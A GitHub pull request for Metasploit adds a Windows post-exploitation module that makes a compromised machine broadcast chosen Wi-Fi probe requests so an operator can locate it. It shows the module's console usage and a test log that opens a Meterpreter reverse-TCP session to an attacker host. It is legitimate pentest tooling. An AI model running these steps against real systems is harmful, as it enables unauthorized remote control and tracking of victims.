Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Post-exploitation module for meterpreter (Windows) to send wireless probe requests #9862

Merged
merged 1 commit into from Apr 20, 2018
Merged

Post-exploitation module for meterpreter (Windows) to send wireless probe requests #9862

merged 1 commit into from Apr 20, 2018

Conversation

BorjaMerino
Copy link
Contributor

The module send probe request packets through the wlan interfaces. The user can configure the message to be sent (embedded in the SSID field) with a max length of 32 bytes and the time spent in seconds sending those packets (considering a sleep of 10 seconds between each probe request).

The module borrows most of its code from the @thelightcosine wlan_* modules (everything revolves around the wlanscan API and the DOT11_SSID structure).

I did this module because in a physical pentest I needed to know if I was close to the "victim host"; post/multi/manage/play_youtube is not a very stealth option :). It could be useful for similar scenarios: to check wireless IDS countermeasures, to coordinate various actions with the team, etc.

Verification

msf5 > use post/windows/wlan/wlan_probe_request 
msf5 post(windows/wlan/wlan_probe_request) > set verbose true
verbose => true
msf5 post(windows/wlan/wlan_probe_request) > set SSID "are you around?"
SSID => are you around?
msf5 post(windows/wlan/wlan_probe_request) > set timeout 300
timeout => 300
msf5 post(windows/wlan/wlan_probe_request) > set session 1
session => 1
msf5 post(windows/wlan/wlan_probe_request) > run

[*] Wlan interfaces found: 1
[*] Sending probe requests for 300 seconds
[*] Interface Guid: 924b1d4a308ed74fab6b85c9dcb484a7
[*] Interface State: The interface is connected to a network.
[*] DOT11_SSID payload: f:0:0:0:61:72:65:20:79:6f:75:20:61:72:6f:75:6e:64:3f
[*] Interface Guid: 924b1d4a308ed74fab6b85c9dcb484a7
[*] Interface State: The interface is connected to a network.
[*] DOT11_SSID payload: f:0:0:0:61:72:65:20:79:6f:75:20:61:72:6f:75:6e:64:3f

To read the probe requests remember to set the wlan interface in monitor mode. Example: https://twitter.com/BorjaMerino/status/984044030534324224

@bwatters-r7
Copy link
Contributor

Testing

msf exploit(ms17_010_eternalblue) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf exploit(handler) > set lport 4567
lport => 4567
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.135.111:4567 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 192.168.135.157
[*] Meterpreter session 1 opened (192.168.135.111:4567 -> 192.168.135.157:50661) at 2018-04-20 13:20:34 -0500

meterpreter > sysinfo
Computer        : WIN10X64-1703
OS              : Windows 10 (Build 15063).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/wlan/wlan_probe_request 
msf post(wlan_probe_request) > set ssid "TEST"
ssid => TEST
msf post(wlan_probe_request) > set timeout 300
timeout => 300
msf post(wlan_probe_request) > set session 1
session => 1
msf post(wlan_probe_request) > run

[*] Wlan interfaces found: 1
[*] Sending probe requests for 300 seconds
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(wlan_probe_request) > 


tmoose@ubuntu:~$ sudo python probemon.py -t unix -i mon0 -s -r -l | grep TEST
1524248955	74:ea:3a:8e:a1:6d	TEST	-59
1524248955	74:ea:3a:8e:a1:6d	TEST	-73
1524248955	74:ea:3a:8e:a1:6d	TEST	-63
1524248955	74:ea:3a:8e:a1:6d	TEST	-68
1524248956	74:ea:3a:8e:a1:6d	TEST	-74
1524248965	74:ea:3a:8e:a1:6d	TEST	-59
1524248965	74:ea:3a:8e:a1:6d	TEST	-60
1524248965	74:ea:3a:8e:a1:6d	TEST	-74
1524248965	74:ea:3a:8e:a1:6d	TEST	-73
1524248965	74:ea:3a:8e:a1:6d	TEST	-63
1524248965	74:ea:3a:8e:a1:6d	TEST	-63
1524248965	74:ea:3a:8e:a1:6d	TEST	-78
^C
[ruby-2.3.1]tmoose@ubuntu:~$

@bwatters-r7 bwatters-r7 merged commit 2d33320 into rapid7:master Apr 20, 2018
bwatters-r7 added a commit that referenced this pull request Apr 20, 2018
@bwatters-r7
Land #9862, Post-exploitation module for meterpreter (Windows) to sen…
f12f6d5 
…d wireless probe requests

Merge branch 'land-9862' into upstream-master
@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Apr 20, 2018
edited by allrosenthal-r7

Release Notes

The new post/windows/wlan/wlan_probe_request module enables you to cause a compromised machine's wireless card to broadcast a specific SSID, allowing geolocation on a small scale.

msjenkins-r7 pushed a commit that referenced this pull request Apr 23, 2018
@bwatters-r7 @msjenkins-r7
Land #9862, Post-exploitation module for meterpreter (Windows) to sen…
6cbd7ba 
…d wireless probe requests

Merge branch 'land-9862' into upstream-master
@BorjaMerino
Copy link
Contributor Author

@bwatters-r7 if it's not too much trouble, could you change the author's field. It does not matter much but forget to put the name:

'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',

Thank you.

@allrosenthal-r7 allrosenthal-r7 added the rn-enhancement release notes enhancement label May 1, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@bwatters-r7 bwatters-r7

Labels
module needs-docs rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@BorjaMerino @bwatters-r7 @bcoles @allrosenthal-r7